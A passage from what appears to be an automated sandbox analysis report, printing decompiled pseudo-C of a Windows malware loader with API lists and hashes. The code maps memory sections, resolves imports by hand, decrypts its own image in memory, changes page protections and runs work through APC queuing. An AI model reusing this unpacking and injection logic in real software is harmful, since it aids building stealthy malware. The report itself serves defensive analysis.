                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_v24 =  *((intOrPtr*)(__eax + 4));
                                                				_v16 = 0;
                                                				_v12 = 0;
                                                				_v48 = 0x18;
                                                				_v44 = 0;
                                                				_v36 = 0x40;
                                                				_v40 = 0;
                                                				_v32 = 0;
                                                				_v28 = 0;
                                                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                				if(_t34 < 0) {
                                                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                				} else {
                                                					 *_t48 = _v16;
                                                					_t39 = E00401179(_t48,  &_v12); // executed
                                                					_t47 = _t39;
                                                					if(_t47 != 0) {
                                                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                					} else {
                                                						memset(_v12, 0, _v24);
                                                						 *_a4 = _v12;
                                                					}
                                                				}
                                                				return _t47;
                                                			}


















                                                0x00401601
                                                0x00401608
                                                0x00401609
                                                0x0040160a
                                                0x0040160b
                                                0x0040160c
                                                0x0040161d
                                                0x00401621
                                                0x00401635
                                                0x00401638
                                                0x0040163b
                                                0x00401642
                                                0x00401645
                                                0x0040164c
                                                0x0040164f
                                                0x00401652
                                                0x00401655
                                                0x0040165a
                                                0x00401695
                                                0x0040165c
                                                0x0040165f
                                                0x00401665
                                                0x0040166a
                                                0x0040166e
                                                0x0040168c
                                                0x00401670
                                                0x00401677
                                                0x00401685
                                                0x00401685
                                                0x0040166e
                                                0x0040169d

                                                APIs
                                                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 00401655
                                                  • Part of subcall function 00401179: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040166A,00000002,00000000,?,?,00000000,?,?,0040166A,00000002), ref: 004011A6
                                                • memset.NTDLL ref: 00401677
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.478151936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Section$CreateViewmemset
                                                • String ID: @
                                                • API String ID: 2533685722-2766056989
                                                • Opcode ID: e7759f9b22afe7078153170e99c91ce840bd3a713fa02149d90eb1973a4dc60d
                                                • Instruction ID: 8578c12e99bd0a749547e6ec221efe435b37e9e0cc2328d3fc1cd28961d34870
                                                • Opcode Fuzzy Hash: e7759f9b22afe7078153170e99c91ce840bd3a713fa02149d90eb1973a4dc60d
                                                • Instruction Fuzzy Hash: 5C214DB1D00209AFCB00DFA9C8809EEFBB9EF48354F10483AE645F3250D7359A488FA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00401303(void* __edi, intOrPtr _a4) {
                                                				signed int _v8;
                                                				intOrPtr* _v12;
                                                				_Unknown_base(*)()** _v16;
                                                				signed int _v20;
                                                				signed short _v24;
                                                				struct HINSTANCE__* _v28;
                                                				intOrPtr _t43;
                                                				intOrPtr* _t45;
                                                				intOrPtr _t46;
                                                				struct HINSTANCE__* _t47;
                                                				intOrPtr* _t49;
                                                				intOrPtr _t50;
                                                				signed short _t51;
                                                				_Unknown_base(*)()* _t53;
                                                				CHAR* _t54;
                                                				_Unknown_base(*)()* _t55;
                                                				void* _t58;
                                                				signed int _t59;
                                                				_Unknown_base(*)()* _t60;
                                                				intOrPtr _t61;
                                                				intOrPtr _t65;
                                                				signed int _t68;
                                                				void* _t69;
                                                				CHAR* _t71;
                                                				signed short* _t73;
                                                
                                                				_t69 = __edi;
                                                				_v20 = _v20 & 0x00000000;
                                                				_t59 =  *0x403100;
                                                				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                                                				if(_t43 != 0) {
                                                					_t45 = _t43 + __edi;
                                                					_v12 = _t45;
                                                					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                					if(_t46 != 0) {
                                                						while(1) {
                                                							_t71 = _t46 + _t69;
                                                							_t47 = LoadLibraryA(_t71); // executed
                                                							_v28 = _t47;
                                                							if(_t47 == 0) {
                                                								break;
                                                							}
                                                							_v24 = _v24 & 0x00000000;
                                                							 *_t71 = _t59 - 0x63699bc3;
                                                							_t49 = _v12;
                                                							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                							_t50 =  *_t49;
                                                							if(_t50 != 0) {
                                                								L6:
                                                								_t73 = _t50 + _t69;
                                                								_v16 = _t61 + _t69;
                                                								while(1) {
                                                									_t51 =  *_t73;
                                                									if(_t51 == 0) {
                                                										break;
                                                									}
                                                									if(__eflags < 0) {
                                                										__eflags = _t51 - _t69;
                                                										if(_t51 < _t69) {
                                                											L12:
                                                											_t21 =  &_v8;
                                                											 *_t21 = _v8 & 0x00000000;
                                                											__eflags =  *_t21;
                                                											_v24 =  *_t73 & 0x0000ffff;
                                                										} else {
                                                											_t65 = _a4;
                                                											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                												goto L12;
                                                											} else {
                                                												goto L11;
                                                											}
                                                										}
                                                									} else {
                                                										_t51 = _t51 + _t69;
                                                										L11:
                                                										_v8 = _t51;
                                                									}
                                                									_t53 = _v8;
                                                									__eflags = _t53;
                                                									if(_t53 == 0) {
                                                										_t54 = _v24 & 0x0000ffff;
                                                									} else {
                                                										_t54 = _t53 + 2;
                                                									}
                                                									_t55 = GetProcAddress(_v28, _t54);
                                                									__eflags = _t55;
                                                									if(__eflags == 0) {
                                                										_v20 = _t59 - 0x63699b44;
                                                									} else {
                                                										_t68 = _v8;
                                                										__eflags = _t68;
                                                										if(_t68 != 0) {
                                                											 *_t68 = _t59 - 0x63699bc3;
                                                										}
                                                										 *_v16 = _t55;
                                                										_t58 = 0x725990f8 + _t59 * 4;
                                                										_t73 = _t73 + _t58;
                                                										_t32 =  &_v16;
                                                										 *_t32 = _v16 + _t58;
                                                										__eflags =  *_t32;
                                                										continue;
                                                									}
                                                									goto L23;
                                                								}
                                                							} else {
                                                								_t50 = _t61;
                                                								if(_t61 != 0) {
                                                									goto L6;
                                                								}
                                                							}
                                                							L23:
                                                							_v12 = _v12 + 0x14;
                                                							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                							if(_t46 != 0) {
                                                								continue;
                                                							} else {
                                                							}
                                                							L26:
                                                							goto L27;
                                                						}
                                                						_t60 = _t59 + 0x9c9664bb;
                                                						__eflags = _t60;
                                                						_v20 = _t60;
                                                						goto L26;
                                                					}
                                                				}
                                                				L27:
                                                				return _v20;
                                                			}




























                                                0x00401303
                                                0x0040130c
                                                0x00401311
                                                0x00401317
                                                0x00401320
                                                0x00401326
                                                0x00401328
                                                0x0040132b
                                                0x00401330
                                                0x00401337
                                                0x00401337
                                                0x0040133b
                                                0x00401343
                                                0x00401346
                                                0x00000000
                                                0x00000000
                                                0x0040134c
                                                0x00401356
                                                0x00401358
                                                0x0040135b
                                                0x0040135e
                                                0x00401362
                                                0x0040136a
                                                0x0040136c
                                                0x0040136f
                                                0x004013d7
                                                0x004013d7
                                                0x004013db
                                                0x00000000
                                                0x00000000
                                                0x00401374
                                                0x0040137a
                                                0x0040137c
                                                0x0040138f
                                                0x00401392
                                                0x00401392
                                                0x00401392
                                                0x00401396
                                                0x0040137e
                                                0x0040137e
                                                0x00401386
                                                0x00401388
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00401388
                                                0x00401376
                                                0x00401376
                                                0x0040138a
                                                0x0040138a
                                                0x0040138a
                                                0x00401399
                                                0x0040139c
                                                0x0040139e
                                                0x004013a5
                                                0x004013a0
                                                0x004013a0
                                                0x004013a0
                                                0x004013ad
                                                0x004013b3
                                                0x004013b5
                                                0x004013e5
                                                0x004013b7
                                                0x004013b7
                                                0x004013ba
                                                0x004013bc
                                                0x004013c4
                                                0x004013c4
                                                0x004013c9
                                                0x004013cb
                                                0x004013d2
                                                0x004013d4
                                                0x004013d4
                                                0x004013d4
                                                0x00000000
                                                0x004013d4
                                                0x00000000
                                                0x004013b5
                                                0x00401364
                                                0x00401366
                                                0x00401368
                                                0x00000000
                                                0x00000000
                                                0x00401368
                                                0x004013e8
                                                0x004013e8
                                                0x004013ef
                                                0x004013f4
                                                0x00000000
                                                0x00000000
                                                0x004013fa
                                                0x00401405
                                                0x00000000
                                                0x00401405
                                                0x004013fc
                                                0x004013fc
                                                0x00401402
                                                0x00000000
                                                0x00401402
                                                0x00401330
                                                0x00401406
                                                0x0040140b

                                                APIs
                                                • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 0040133B
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004013AD
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.478151936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID:
                                                • API String ID: 2574300362-0
                                                • Opcode ID: 280cc9ffd1f4fc6288faee4beca7961ca0c701b0e65a990b6e63aba8aa0b2b4d
                                                • Instruction ID: fea321f2731755a56b31f73c1fd9c5fc454385bd715bc913fab0974c33593810
                                                • Opcode Fuzzy Hash: 280cc9ffd1f4fc6288faee4beca7961ca0c701b0e65a990b6e63aba8aa0b2b4d
                                                • Instruction Fuzzy Hash: 41311871A002069FEB14CF99C980AAEB7F9BF14315B24407ADC01F73A0E778EA41CB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E00401179(void** __esi, PVOID* _a4) {
                                                				long _v8;
                                                				void* _v12;
                                                				void* _v16;
                                                				long _t13;
                                                
                                                				_v16 = 0;
                                                				asm("stosd");
                                                				_v8 = 0;
                                                				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                				if(_t13 < 0) {
                                                					_push(_t13);
                                                					return __esi[6]();
                                                				}
                                                				return 0;
                                                			}







                                                0x0040118b
                                                0x00401191
                                                0x0040119f
                                                0x004011a6
                                                0x004011ab
                                                0x004011b1
                                                0x00000000
                                                0x004011b2
                                                0x00000000

                                                APIs
                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040166A,00000002,00000000,?,?,00000000,?,?,0040166A,00000002), ref: 004011A6
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.478151936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: SectionView
                                                • String ID:
                                                • API String ID: 1323581903-0
                                                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                • Instruction ID: ed97cea995b8fb2683511ca8038b57e0ff698fb14a2993533bf492e938ba84c3
                                                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                • Instruction Fuzzy Hash: ADF037B590020CFFDB119FA5CCC5C9FBBBDEB48354B104A3AF652E51A0D6309E089B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E00401791(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                				intOrPtr _v12;
                                                				struct _FILETIME* _v16;
                                                				short _v60;
                                                				struct _FILETIME* _t14;
                                                				intOrPtr _t15;
                                                				long _t18;
                                                				void* _t19;
                                                				void* _t22;
                                                				intOrPtr _t31;
                                                				long _t32;
                                                				void* _t34;
                                                
                                                				_t31 = __edx;
                                                				_t14 =  &_v16;
                                                				GetSystemTimeAsFileTime(_t14);
                                                				_push(0x192);
                                                				_push(0x54d38000);
                                                				_push(_v12);
                                                				_push(_v16);
                                                				L00401ED6();
                                                				_push(_t14);
                                                				_v16 = _t14;
                                                				_t15 =  *0x403104;
                                                				_push(_t15 + 0x40405e);
                                                				_push(_t15 + 0x404054);
                                                				_push(0x16);
                                                				_push( &_v60);
                                                				_v12 = _t31;
                                                				L00401ED0();
                                                				_t18 = _a4;
                                                				if(_t18 == 0) {
                                                					_t18 = 0x1000;
                                                				}
                                                				_t19 = CreateFileMappingW(0xffffffff, 0x403108, 4, 0, _t18,  &_v60); // executed
                                                				_t34 = _t19;
                                                				if(_t34 == 0) {
                                                					_t32 = GetLastError();
                                                				} else {
                                                					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                						if(_t22 == 0) {
                                                							_t32 = GetLastError();
                                                							if(_t32 != 0) {
                                                								goto L9;
                                                							}
                                                						} else {
                                                							 *_a8 = _t34;
                                                							 *_a12 = _t22;
                                                							_t32 = 0;
                                                						}
                                                					} else {
                                                						_t32 = 2;
                                                						L9:
                                                						CloseHandle(_t34);
                                                					}
                                                				}
                                                				return _t32;
                                                			}














                                                0x00401791
                                                0x0040179a
                                                0x0040179e
                                                0x004017a4
                                                0x004017a9
                                                0x004017ae
                                                0x004017b1
                                                0x004017b4
                                                0x004017b9
                                                0x004017ba
                                                0x004017bd
                                                0x004017c8
                                                0x004017cf
                                                0x004017d3
                                                0x004017d5
                                                0x004017d6
                                                0x004017d9
                                                0x004017de
                                                0x004017e8
                                                0x004017ea
                                                0x004017ea
                                                0x004017fe
                                                0x00401804
                                                0x00401808
                                                0x00401858
                                                0x0040180a
                                                0x00401813
                                                0x00401829
                                                0x00401831
                                                0x00401843
                                                0x00401847
                                                0x00000000
                                                0x00000000
                                                0x00401833
                                                0x00401836
                                                0x0040183b
                                                0x0040183d
                                                0x0040183d
                                                0x0040181e
                                                0x00401820
                                                0x00401849
                                                0x0040184a
                                                0x0040184a
                                                0x00401813
                                                0x00401860

                                                APIs
                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401BEC,0000000A,?,?), ref: 0040179E
                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 004017B4
                                                • _snwprintf.NTDLL ref: 004017D9
                                                • CreateFileMappingW.KERNELBASE(000000FF,00403108,00000004,00000000,?,?), ref: 004017FE
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401BEC,0000000A,?), ref: 00401815
                                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401829
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401BEC,0000000A,?), ref: 00401841
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401BEC,0000000A), ref: 0040184A
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401BEC,0000000A,?), ref: 00401852
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.478151936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                • String ID:
                                                • API String ID: 1724014008-0
                                                • Opcode ID: 88fb9737f7d3a276464fb517c89664b094cb591821672ee2c3833b4a695900a9
                                                • Instruction ID: 5ccf45513b3f71cc1a5de621ac13b737f0f71ba8b3c1280588684e7fab4ca713
                                                • Opcode Fuzzy Hash: 88fb9737f7d3a276464fb517c89664b094cb591821672ee2c3833b4a695900a9
                                                • Instruction Fuzzy Hash: B92192B2500208AFD711BF94DD88EAE77A9EB48354F104036FB16F71E0D6785A458B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00401D12(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                				intOrPtr _v8;
                                                				_Unknown_base(*)()* _t29;
                                                				_Unknown_base(*)()* _t33;
                                                				_Unknown_base(*)()* _t36;
                                                				_Unknown_base(*)()* _t39;
                                                				_Unknown_base(*)()* _t42;
                                                				intOrPtr _t46;
                                                				struct HINSTANCE__* _t50;
                                                				intOrPtr _t56;
                                                
                                                				_t56 = E00401C27(0x20);
                                                				if(_t56 == 0) {
                                                					_v8 = 8;
                                                				} else {
                                                					_t50 = GetModuleHandleA( *0x403104 + 0x404014);
                                                					_v8 = 0x7f;
                                                					_t29 = GetProcAddress(_t50,  *0x403104 + 0x404151);
                                                					 *(_t56 + 0xc) = _t29;
                                                					if(_t29 == 0) {
                                                						L8:
                                                						E00401722(_t56);
                                                					} else {
                                                						_t33 = GetProcAddress(_t50,  *0x403104 + 0x404161);
                                                						 *(_t56 + 0x10) = _t33;
                                                						if(_t33 == 0) {
                                                							goto L8;
                                                						} else {
                                                							_t36 = GetProcAddress(_t50,  *0x403104 + 0x404174);
                                                							 *(_t56 + 0x14) = _t36;
                                                							if(_t36 == 0) {
                                                								goto L8;
                                                							} else {
                                                								_t39 = GetProcAddress(_t50,  *0x403104 + 0x404189);
                                                								 *(_t56 + 0x18) = _t39;
                                                								if(_t39 == 0) {
                                                									goto L8;
                                                								} else {
                                                									_t42 = GetProcAddress(_t50,  *0x403104 + 0x40419f);
                                                									 *(_t56 + 0x1c) = _t42;
                                                									if(_t42 == 0) {
                                                										goto L8;
                                                									} else {
                                                										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                										_t46 = E004015F8(_t56, _a12); // executed
                                                										_v8 = _t46;
                                                										if(_t46 != 0) {
                                                											goto L8;
                                                										} else {
                                                											 *_a16 = _t56;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				return _v8;
                                                			}












                                                0x00401d20
                                                0x00401d24
                                                0x00401de5
                                                0x00401d2a
                                                0x00401d42
                                                0x00401d51
                                                0x00401d58
                                                0x00401d5c
                                                0x00401d5f
                                                0x00401ddd
                                                0x00401dde
                                                0x00401d61
                                                0x00401d6e
                                                0x00401d72
                                                0x00401d75
                                                0x00000000
                                                0x00401d77
                                                0x00401d84
                                                0x00401d88
                                                0x00401d8b
                                                0x00000000
                                                0x00401d8d
                                                0x00401d9a
                                                0x00401d9e
                                                0x00401da1
                                                0x00000000
                                                0x00401da3
                                                0x00401db0
                                                0x00401db4
                                                0x00401db7
                                                0x00000000
                                                0x00401db9
                                                0x00401dbf
                                                0x00401dc5
                                                0x00401dca
                                                0x00401dd1
                                                0x00401dd4
                                                0x00000000
                                                0x00401dd6
                                                0x00401dd9
                                                0x00401dd9
                                                0x00401dd4
                                                0x00401db7
                                                0x00401da1
                                                0x00401d8b
                                                0x00401d75
                                                0x00401d5f
                                                0x00401df3

                                                APIs
                                                  • Part of subcall function 00401C27: HeapAlloc.KERNEL32(00000000,?,004016BE,00000208,?,00000000,?,?,?,00401473,?), ref: 00401C33
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401590,?,?,?,?,?,00000002,?,?), ref: 00401D36
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401D58
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401D6E
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401D84
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401D9A
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401DB0
                                                  • Part of subcall function 004015F8: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 00401655
                                                  • Part of subcall function 004015F8: memset.NTDLL ref: 00401677
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.478151936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                • String ID:
                                                • API String ID: 1632424568-0
                                                • Opcode ID: 3e22bd1ebac88f7bb3f3fa42a4141e94142cc9d3a9a4339583e69aac5db44d28
                                                • Instruction ID: cb949599aa8265611a8b5fd83aad6e08e7f1af44583dd6890be368898b5ba44d
                                                • Opcode Fuzzy Hash: 3e22bd1ebac88f7bb3f3fa42a4141e94142cc9d3a9a4339583e69aac5db44d28
                                                • Instruction Fuzzy Hash: 26214FB160060AAFDB10DFAADD84D677BECAF48344700047AE609EB2A1D774E9018F68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			_entry_() {
                                                				void* _t1;
                                                				int _t4;
                                                				void* _t6;
                                                				int _t7;
                                                
                                                				_t7 = 0;
                                                				_t1 = HeapCreate(0, 0x400000, 0); // executed
                                                				 *0x4030e0 = _t1;
                                                				if(_t1 != 0) {
                                                					 *0x4030f0 = GetModuleHandleA(0);
                                                					GetCommandLineW(); // executed
                                                					_t4 = E0040140E(_t6); // executed
                                                					_t7 = _t4;
                                                					HeapDestroy( *0x4030e0);
                                                				}
                                                				ExitProcess(_t7);
                                                			}







                                                0x004012be
                                                0x004012c7
                                                0x004012cf
                                                0x004012d4
                                                0x004012dd
                                                0x004012e2
                                                0x004012e8
                                                0x004012f3
                                                0x004012f5
                                                0x004012f5
                                                0x004012fc

                                                APIs
                                                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 004012C7
                                                • GetModuleHandleA.KERNEL32(00000000), ref: 004012D7
                                                • GetCommandLineW.KERNEL32 ref: 004012E2
                                                  • Part of subcall function 0040140E: GetSystemTime.KERNEL32(?,00000000), ref: 0040142C
                                                  • Part of subcall function 0040140E: SwitchToThread.KERNEL32 ref: 00401432
                                                  • Part of subcall function 0040140E: Sleep.KERNELBASE(00000000,00000000), ref: 00401453
                                                  • Part of subcall function 0040140E: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401482
                                                  • Part of subcall function 0040140E: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 004014A2
                                                  • Part of subcall function 0040140E: CreateThread.KERNELBASE(00000000,00000000,00000000,00000000), ref: 004014CE
                                                  • Part of subcall function 0040140E: QueueUserAPC.KERNELBASE(00401B73,00000000,?), ref: 004014EA
                                                  • Part of subcall function 0040140E: GetLastError.KERNEL32 ref: 004014FA
                                                  • Part of subcall function 0040140E: TerminateThread.KERNEL32(00000000,00000000), ref: 00401501
                                                  • Part of subcall function 0040140E: CloseHandle.KERNEL32(00000000), ref: 00401508
                                                  • Part of subcall function 0040140E: SetLastError.KERNEL32(?), ref: 0040150F
                                                  • Part of subcall function 0040140E: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040151C
                                                  • Part of subcall function 0040140E: GetExitCodeThread.KERNEL32(00000000,?), ref: 0040152E
                                                • HeapDestroy.KERNEL32 ref: 004012F5
                                                • ExitProcess.KERNEL32 ref: 004012FC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.478151936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Thread$CreateErrorExitHandleHeapLastLongNamePath$CloseCodeCommandDestroyLineModuleObjectProcessQueueSingleSleepSwitchSystemTerminateTimeUserWait
                                                • String ID:
                                                • API String ID: 2098575201-0
                                                • Opcode ID: 9571a28afc343b0c333af890456fd979102732c56a3548e61a28912a6c2056a7
                                                • Instruction ID: 778cdab925d678b4a920fdf3b02a2b013da220d48eef874f85008a4413756c8d
                                                • Opcode Fuzzy Hash: 9571a28afc343b0c333af890456fd979102732c56a3548e61a28912a6c2056a7
                                                • Instruction Fuzzy Hash: 7AE092305026209BC7112F61AF0CA4B3E7DBF053827108536F602F21B1DBB84501CAAC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E00401000(void* __edi, intOrPtr _a4) {
                                                				intOrPtr _v8;
                                                				unsigned int _v12;
                                                				intOrPtr _v16;
                                                				char _v20;
                                                				void* _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				void* _v36;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				intOrPtr _t39;
                                                				void* _t46;
                                                				intOrPtr _t47;
                                                				intOrPtr _t50;
                                                				signed int _t59;
                                                				signed int _t61;
                                                				intOrPtr _t66;
                                                				intOrPtr _t77;
                                                				void* _t78;
                                                				signed int _t80;
                                                
                                                				_t77 =  *0x4030f0;
                                                				_t1 =  &_v12; // 0xa
                                                				_t2 =  &_v20; // 0x2
                                                				_t39 = E00401737(_t77, _t2, _t1);
                                                				_v16 = _t39;
                                                				if(_t39 == 0) {
                                                					asm("sbb ebx, ebx");
                                                					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                					_t78 = _t77 + _v20;
                                                					_v36 = _t78;
                                                					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                                					_v24 = _t46;
                                                					if(_t46 == 0) {
                                                						_v16 = 8;
                                                					} else {
                                                						_t61 = 0;
                                                						if(_t59 <= 0) {
                                                							_t47 =  *0x403100;
                                                						} else {
                                                							_t66 = _a4;
                                                							_t50 = _t46 - _t78;
                                                							_t11 = _t66 + 0x4041a7; // 0x4041a7
                                                							_v28 = _t50;
                                                							_v32 = _t50 + _t11;
                                                							_v8 = _t78;
                                                							while(1) {
                                                								asm("movsd");
                                                								asm("movsd");
                                                								asm("movsd");
                                                								_t19 = _t61 + 1; // 0x1
                                                								_t80 = _t19;
                                                								E0040111B(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                								_v8 = _v8 + 0x1000;
                                                								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_v32 + 8)) +  *((intOrPtr*)(_v32 + 4));
                                                								_t61 = _t80;
                                                								 *0x403100 = _t47;
                                                								if(_t61 >= _t59) {
                                                									break;
                                                								}
                                                								_t50 = _v28;
                                                							}
                                                						}
                                                						if(_t47 != 0x63699bc3) {
                                                							_v16 = 0xc;
                                                						} else {
                                                							memcpy(_v36, _v24, _v12);
                                                						}
                                                						VirtualFree(_v24, 0, 0x8000); // executed
                                                					}
                                                				}
                                                				return _v16;
                                                			}























                                                0x00401007
                                                0x0040100d
                                                0x00401011
                                                0x00401017
                                                0x0040101e
                                                0x00401021
                                                0x00401036
                                                0x0040103d
                                                0x00401042
                                                0x00401053
                                                0x00401056
                                                0x0040105e
                                                0x00401061
                                                0x0040110b
                                                0x00401067
                                                0x00401067
                                                0x0040106b
                                                0x004010d3
                                                0x0040106d
                                                0x0040106d
                                                0x00401070
                                                0x00401072
                                                0x0040107a
                                                0x0040107d
                                                0x00401080
                                                0x00401088
                                                0x00401090
                                                0x00401091
                                                0x00401092
                                                0x00401099
                                                0x00401099
                                                0x004010ad
                                                0x004010bb
                                                0x004010c2
                                                0x004010c5
                                                0x004010c9
                                                0x004010ce
                                                0x00000000
                                                0x00000000
                                                0x00401085
                                                0x00401085
                                                0x004010d0
                                                0x004010dd
                                                0x004010f2
                                                0x004010df
                                                0x004010e8
                                                0x004010ed
                                                0x00401103
                                                0x00401103
                                                0x00401112
                                                0x00401118

                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,00000000,?,00000000,00000000), ref: 00401056
                                                • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?,0040144C,00000000), ref: 004010E8
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00401103
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.478151936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Virtual$AllocFreememcpy
                                                • String ID: Mar 9 2021
                                                • API String ID: 4010158826-2159264323
                                                • Opcode ID: 384eeca095e46ede16794905c917f7df68f55105d74b5c6885c8e08104c05502
                                                • Instruction ID: a0e6c592a77d05f43e4ecf9014ddae3873bc0d002c12bfda25a6c8be2d4e86e8
                                                • Opcode Fuzzy Hash: 384eeca095e46ede16794905c917f7df68f55105d74b5c6885c8e08104c05502
                                                • Instruction Fuzzy Hash: 25316571E002199FDB01CF99CD81BAEFBB5BF48304F108179E505BB291D775AA46CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E004011BB(void* __eax, void* _a4) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				long _v20;
                                                				int _t43;
                                                				long _t54;
                                                				signed int _t57;
                                                				void* _t58;
                                                				signed int _t60;
                                                
                                                				_v12 = _v12 & 0x00000000;
                                                				_t57 =  *0x403100;
                                                				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                                                				_v8 = _v8 & 0x00000000;
                                                				if(_v16 <= 0) {
                                                					L12:
                                                					return _v12;
                                                				} else {
                                                					goto L1;
                                                				}
                                                				while(1) {
                                                					L1:
                                                					_t60 = _v12;
                                                					if(_t60 != 0) {
                                                						goto L12;
                                                					}
                                                					asm("bt [esi+0x24], eax");
                                                					if(_t60 >= 0) {
                                                						asm("bt [esi+0x24], eax");
                                                						if(__eflags >= 0) {
                                                							L8:
                                                							_t54 = _t57 - 0x63699bbf;
                                                							L9:
                                                							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                							if(_t43 == 0) {
                                                								_v12 = GetLastError();
                                                							}
                                                							_v8 = _v8 + 1;
                                                							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                                                							if(_v8 < _v16) {
                                                								continue;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						}
                                                						asm("bt [esi+0x24], eax");
                                                						_t54 = _t57 - 0x63699bc1;
